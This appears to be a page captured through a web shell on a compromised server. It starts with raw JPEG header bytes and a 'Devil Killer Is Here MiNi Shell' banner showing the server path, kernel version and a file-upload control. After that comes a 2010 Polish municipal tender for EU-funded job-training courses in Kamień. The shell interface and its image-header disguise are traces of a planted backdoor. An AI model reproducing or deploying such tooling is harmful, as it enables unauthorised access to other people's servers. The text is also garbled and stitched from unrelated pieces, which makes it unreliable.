JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100427/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100427/117336-N-2010.html

<p class="kh_header"><b>Kamień: Organizację i przeprowadzenie szkoleń w ramach projektu Czas na aktywność w gminie Kamień realizowanego przez Gminny Ośrodek Pomocy Społecznej w Kamieniu - współfinansowany z Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 117336 - 2010; data zamieszczenia: 27.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Pomocy Społecznej w Kamieniu , Kamień 287, 36-053 Kamień, woj. podkarpackie, tel. 017 855 67 76, faks 017 855 77 35.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.gminakamien.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizację i przeprowadzenie szkoleń w ramach projektu Czas na aktywność w gminie Kamień realizowanego przez Gminny Ośrodek Pomocy Społecznej w Kamieniu - współfinansowany z Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Organizacja i przeprowadzenie szkoleń w ramach projektu Czas na aktywność w gminie Kamień realizowanego przez Gminny Ośrodek Pomocy Społecznej w Kamieniu współfinansowany z Europejskiego Funduszu Społecznego.

Przedmiot zamówienia obejmuje:

1. Warsztaty kompetencji społecznych

Szkolenie powinno zawierać takie zagadnienia jak: 
1.	Kształtowanie indywidualnych i grupowych relacji interpersonalnych. 
2.	Elementy komunikacji interpersonalnej; werbalna i niewerbalna z elementami komunikacji emocji. 
3.	Asertywność w życiu i pracy zawodowej. 
4.	Rozwiązywanie konfliktów i elementy negocjacji. 
5.	Planowanie działań i podejmowanie decyzji wykorzystaniem technik zarządzania czasem i własnym potencjałem. 
6.	Budowanie pewności siebie i pozytywnego wizerunku na podstawie analizy słabych i mocnych stron 
7.	Tworzenie własnej ścieżki rozwoju osobistego i zawodowego z elementami kształtowania kreatywności w życiu osobistym i zawodowym. 
8.	Radzenie sobie ze stresem i wypaleniem zawodowym 
9.	Rozwijanie umiejętności prezentacji i autoprezentacji. 
10.	Kształtowanie własnej motywacji osiągnięć życiowych i zawodowych 
11.	Wywieranie wpływu przez jednostki i grupę i techniki ochrony przed manipulacją 
12.	Specyfika rynku pracy na Podkarpaciu 
13.	Aktywne metody poszukiwania pracy i działalność instytucji rynku pracy. 
14.	Tworzenie dokumentacji niezbędne j podczas poszukiwania pracy CV i List motywacyjny 
15.	Przygotowanie do rozmowy kwalifikacyjnej 
16.	Zagadnienia związane z utrzymaniem pracy zawodowej z elementami kodeksu pracy 

Miejsce szkolenia: Gmina Kamień
Liczba uczestników: 62 osób
Ilość godzin: 240 godzin dydaktycznych (3 grupy x 80 godz. = 240 godz.). Zajęcia mają być prowadzone przez trenera dla 3 grup.
Termin realizacji: maj - czerwiec  2010
            Zajęcia szkoleniowe muszą odbywać się cztery razy w tygodniu, od poniedziałku do piątku. 

2. Poradnictwo i wsparcie indywidualne oraz grupowe w zakresie podniesienia kompetencji życiowych i umiejętności społeczno zawodowych

Szkolenie powinno zawierać takie zagadnienia jak: 
1.	Rozwijanie umiejętności życiowych gwarantujących stałe podnoszenie jakości życia
2.	Rozwijanie twórczego podejścia do problemów i budowanie efektywnych strategii działania na rzecz rozwoju i przemian we własnym życiu.
3.	Pogłębienie świadomości dotychczasowych osiągnięć

Miejsce szkolenia: Gmina Kamień
Liczba uczestników: 5 osób
Ilość godzin: 24 godzin dydaktycznych (zajęcia indywidualne - 2 godz. x 5 osób stanowi 10 godz.
 i  14 godz. zajęć grupowych)
Termin realizacji: maj - czerwiec 2010

3. Szkolenie: Opiekun osób starszych, niepełnosprawnych i chorych

Program szkolenia obejmuje: 
Psychologiczne i pedagogiczne aspekty opieki nad osobą chorą i starszą
-kompetencje interpersonalne opiekunki. Budowanie i podtrzymywanie dobrych relacji z podopiecznym i jego rodziną
- asertywność, ważna profesjonalna kompetencja opiekunki osób starszych 
- utrzymanie właściwych relacji z podopiecznym i jego rodziną. Bariery w porozumiewaniu się z osobą starszą i przewlekle chorą
- elementy psychopatologii i pielęgniarstwa psychiatrycznego
- rola wsparcia w chorobie, niedołęstwie. Techniki ułatwiające zmniejszenie stresu pacjenta, rodziny. Prowadzenie rozmowy z osobą cierpiącą/umierającą. Prowadzenie rozmów na trudne tematy.
- stres zawodowy  w racy opiekunki, radzenie sobie ze stresem
- zespól wypalenia zawodowego
Opieka nad osobą chorą i starszą - pielęgnacja i higiena
- podawanie leków
- stosowanie opatrunków tradycyjnych i nowoczesnych oraz materiałów medycznych leczenie odleżyn  
- zapewnienie czystości ciała
- zasady układania i przemieszczania pacjenta.
Gerontologia
-starzenie się - zmiany fizjologiczne
- promocja zdrowia osób starszych i organizacja opieki długoterminowej
- kompleksowa ocena geriatryczna
-indywidualny plan opieki dla mieszkańców domów pomocy społecznej
Pierwsza pomoc przedlekarska
- podstawowe czynności życiowe
-automatyczna defibrylacja zewnętrzna
- techniki tlenoterapii
- zachorowania
- urazy u osób w wieku podeszłym
- krwawienie i krwotoki
- zatrucia
Podstawy dietetyki
-podstawy prawidłowego żywienia dla osób w podeszłym wieku
- zasady żywienia w cukrzycy
- zasady żywienia w chorobach układu krążenia
- diety w schorzeniach wątroby i nerek
Choroby wieku podeszłego
-choroby układu oddechowego
- choroby układu krążenia
- choroby układu trawiennego
- demencja- objawy, rodzaje i postępowanie
- osteoporoza i jej powikłania. Choroba zwyrodnienia stawów
- upadki -problem podeszłego wieku
- farmakoterapia - działania uboczne, interakcje leków
- udar mózgu
- choroba Parkinsona i inne choroby ruchu
- podstawy opieki paliatywnej
Warsztaty ogólnorozwojowe z treningiem interpersonalnym, zajęcia psychoruchowe z osobami starszymi oraz niepełnosprawnymi
- podstawy wiedzy o rehabilitacji
- metody terapeutyczne wykorzystywane w procesie rehabilitacji
- postępowanie usprawniające u osób starszych w wybranych schorzeniach układu nerwowego i narządu ruchu
- adaptacja mieszkania osoby starszej i przewlekle chorej do jej potrzeb w kontekście procesu rehabilitacji
-zasady wspomagania osób z uszkodzeniem narządu ruchu podczas czynności życia codziennego, chodzenia, wstawania, wykorzystywane w procesie rehabilitacji. Zasady ćwiczeń fizycznych u osób z cukrzycą
- zasady usprawniania  i profilaktyka w schorzeniach narządu ruchu u osób starszych
- zasady usprawniania w wybranych chorobach układu oddechowego u osób starszych
- zasady usprawniania w wybranych chorobach układu nerwowego u osób starszych
- nauka korzystania ze sprzętu ortopedycznego i pomocy technicznych wykorzystywanych w procesie usprawniania. 
Miejsce szkolenia: Gmina Kamień
Liczba uczestników: 15 osób
Ilość godzin: 120 godzin dydaktycznych
Termin realizacji: lipiec - sierpień - wrzesień 2010

4. Szkolenie: Kurs profesjonalny sprzedawca z obsługą kasy fiskalnej

Program szkolenia obejmuje:

1.	Prawne aspekty odpowiedzialności sprzedawcy 
2.	Odpowiedzialność z tyt. rękojmi i gwarancji 
3.	Reklamacja towaru 
4.	Zwrot towaru 
5.	Odpowiedzialność materialna sprzedawcy 
6.	Zasady ewidencji sprzedaży 
7.	Prawidłowe sporządzanie dokumentów sprzedażowych 
8.	Uwarunkowania prawne dot. kas fiskalnych 
9.	Budowa kasy i drukarki fiskalnej 
10.	Obsługa kas fiskalnych 
11.	raporty kas fiskalnych
12.	fakturowanie i dokumentowanie sprzedaży
13.	zasady identyfikacji fałszywych znaków pieniężnych

Miejsce szkolenia: Gmina Kamień
Liczba uczestników: 11 osoby
Ilość godzin: 96 godzin dydaktycznych w tym 56 godz. praktycznych
Termin realizacji: lipiec - sierpień - wrzesień 2010

5. Szkolenie: kurs obsługi koparko - ładowarki

Po ukończeniu kursu absolwent powinien przystąpić do egzaminu przed Zespołem Egzaminacyjnym działającym w imieniu Komisji Egzaminacyjno-Kwalifikacyjnej dla operatorów maszyn i urządzeń roboczych, budowlanych, i drogowych. Po zdaniu egzaminu praktycznego a następnie teoretycznego powinien otrzymać uprawnienia operatora III kl. koparko-ładowarek. 

Miejsce szkolenia: Powiat rzeszowski
Liczba uczestników: 23 osoby
Ilość godzin: 120 godzin dydaktycznych w tym 60 godz. praktycznych
Termin realizacji: od lipiec do listopad 2010

6. Szkolenie: Kurs spawacza
Liczba uczestników: 5 osoby
- Spawanie blach spoinami czołowymi metodą TIG
- Spawanie rur spoinami czołowymi metodą TIG
Liczba uczestników: 13 osoby
- Spawanie blach i rur spoinami pachwinowymi metodą MAG
- Spawanie blach spoinami czołowymi metodą MAG

Teoretyczne i praktyczne przygotowanie uczestników kursu do egzaminów końcowych wg wytycznych Instytutu Spawalnictwa nr W-07/IS-17
Miejsce szkolenia: Powiat rzeszowski
Termin realizacji: od lipiec do listopad 2010

7. Doradca zawodowy - 4 godz/osobę

Indywidualne konsultacje, w tym diagnoza możliwości zawodowych: rozpoznanie potencjału
zawodowego, urealnienie samooceny i rozwinięcie wglądu we własne możliwości, rozpoznanie indywidualnych obszarów trudności, kwalifikacje zawodowe wymagane na konkretnych stanowiskach pracy, indywidualny plan działania - utwierdzenie podjętej decyzji przez uczestnika projektu dotyczącej ścieżki szkoleń zawodowych oraz przyszłej pracy, analiza potrzeb klienta, samodzielne opracowanie przez uczestnika projektu aplikacji zawodowych - tematyka zostanie dostosowana do indywidualnych potrzeb uczestników, zależeć będzie od ich oczekiwań, poziomu wiedzy i umiejętności, doradztwo.

Miejsce szkolenia: Powiat rzeszowski
Liczba uczestników: 67 osoby
Ilość godzin:  4 godz. na osobę, w tym 2 spotkania po 2 godz.
Termin realizacji: maj - czerwiec 2010
Zajęcia szkoleniowe mają odbywać się od poniedziałku do piątku. Maksymalna ilość godz. dydaktycznych - 8 godz. dziennie zapewniając przynajmniej jedną przerwę na posiłek.
Wykonawca ma przedłożyć harmonogram szkoleń, szczegółowy program szkoleń, określić formy, metody szkolenia/nauki, przewidzianą ilość godzin zajęć teoretycznych i praktycznych.
Wykonawca ponosi wszelkie koszty związane z realizacją zamówienia z uwzględnieniem obowiązujących w tym zakresie przepisów prawa. Wykonawca zapewnia: sale szkoleniowe, sprzęt dydaktyczny, materiały szkoleniowe dla uczestników, warunki w czasie szkoleń zgodne z przepisami BHP, wyżywienie: ciastka, kawa, herbata, ciepły posiłek (obiad składających się z 1 dania). W sali szkoleniowej należy umieścić logo EFS.
Wykonawca pokrywa koszty niezbędnych badań lekarskich uczestników danego szkolenia (wyrobienie książeczki zdrowia) jeżeli specyfika kursu tego wymaga, ubezpieczenia uczestników szkolenia od następstw nieszczęśliwych wypadków (podczas szkolenia, w drodze na szkolenie i ze szkolenia). Wykonawca zapewni, że program szkoleń zawodowych, przeprowadzenie szkolenia musi odbyć się zgodnie z obowiązującymi przepisami prawa(m.in. Rozporządzenie Ministra Edukacji Narodowej oraz Ministra Pracy i Polityki Socjalnej z dnia 12 października 1993 r. w sprawie zasad warunków podnoszenia kwalifikacji zawodowych i wykształcenia ogólnego dorosłych (Dz. U. z 1993 r. Nr 103, poz. 472 z późn. zm). Szkolenie ma zakończyć się oceną zdobytych umiejętności oraz wydaniem stosownego dokumentu:
certyfikatu, dyplomu lub zaświadczenia o ukończeniu szkolenia zgodnie z obowiązującymi w tym zakresie przepisami (Rozporządzenie Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych Dz. U. z 2006 r. Nr 31 poz. 216). Wydane certyfikaty muszą zawierać logo Europejskiego Funduszu Społecznego oraz informację, że projekty były współfinansowane ze środków EFS.

Wykonawca ma dostarczyć Zamawiającemu pełną dokumentację szkoleń tj. m.in. kserokopie dziennika zajęć edukacyjnych zawierającego tematy zajęć i wymiar godzin oraz listę obecności z własnoręcznymi podpisami uczestników szkoleń, potwierdzenia odbioru materiałów szkoleniowych; kserokopie zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia i uzyskanie określonych kwalifikacji, kserokopie rejestru wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia i uzyskanie kwalifikacji, kserokopię protokółu egzaminacyjnego w przypadku kursu kończącego się egzaminem, ankiety oceny szkolenia, informacje końcowe o przebiegu szkolenia wraz z oceną dokonaną na podstawie ankiet przed rozpoczęciem i po zakończeniu szkolenia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiajacy przewiduje udzielenie zamówień uzupełniających polegających na powtórzeniu tego samego rodzaju zamówień. Wielkość zamówień uzupełniających do 50% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8, 80.53.00.00-8, 80.56.10.00-4, 80.57.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamwiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadają aktualny wpis do rejestru instytucji szkoleniowych wydawany przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej (zgodnie z Rozporządzeniem Ministra Gospodarki i Pracy z dnia 27 października 2004r. w sprawie rejestru instytucji szkoleniowych Dz. U. Nr 236 poz. 2365),. Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana według formuły: SPEŁNIA - NIE SPEŁNIA, na podstawie analizy złozonych dokumentów.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali należycie co najmniej 2 usługi szkoleniowe dla minimum 15 osób każda, współfinansowane z Europejskiego Funduszu Społecznego (zał. nr 5)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamwiający oceni spełnienie  tego warunku na podstawie treści oświadczenia o spełnianiu warunków udziału w postepowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia tj. dysponują osobami posiadającymi kwalifikacje zawodowe oraz doświadczenie i wykształcenie niezbędne do wykonania przedmiotu zamówienia (psycholog, prawnik, trener, doradca zawodowy itp.), według załącznika nr 6 (wykaz osób do realizacji zamówienia)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykaz podwykonawców, których zamierza zaangażować wykonawca  do wykonania zamówienia (jeżeli wykonawca przewiduje zaangażowanie podwykonawców do wynonania zamówienia).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Stosownie do art. 144 ustawy Prawo zamówień publicznych zamawiający zastrzega możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której wybrano wykonawcę polegającej na:
a) zmianie terminu realizacji zamówienia z przyczyn niezależnych od Zamawiającego jak również Wykonawcy - z powodu nagłej i znacznej ilości rezygnacji przez uczestników szkolenia, zmiany kluczowego personelu Wykonawcy - za uprzednią zgodą zamawiającego wyrażoną na piśmie, jeżeli wynika z przyczyn niezależnych od Wykonawcy (np. zdarzenia losowe: choroba, wypadek itp.); 
b) wynagrodzenia w przypadku zmniejszenia ilości usług przez Zamawiającego 
c) jeżeli nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia,
2. Warunki dokonywania zmian postanowień umowy:
1) inicjowanie zmian na wniosek wykonawcy lub zamawiającego,
2) uzasadnienie zmiany prawidłową realizacją przedmiotu umowy,
3) forma pisemna pod rygorem nieważności w formie aneksu do umów</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.gminakamien.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Pomocy Społecznej w Kamieniu
36 - 053 Kamień 287.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.05.2010 godzina 10:00, miejsce: Gminnym Ośrodku Pomocy Społecznej w Kamieniu
Kamień 287, 36-053 Kamień, I piętro, lub przesłać listownie w terminie do dnia 06.05.2010 r..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt systemowy Gminnego Ośrodka Pomocy Społecznej w Kamieniu pn. Czas na aktywność w gminie Kamień realizowany jest w ramach Priorytetu VII PO KL Promocja Intergracji Społecznej Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej. Współfinansowane przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.</p>
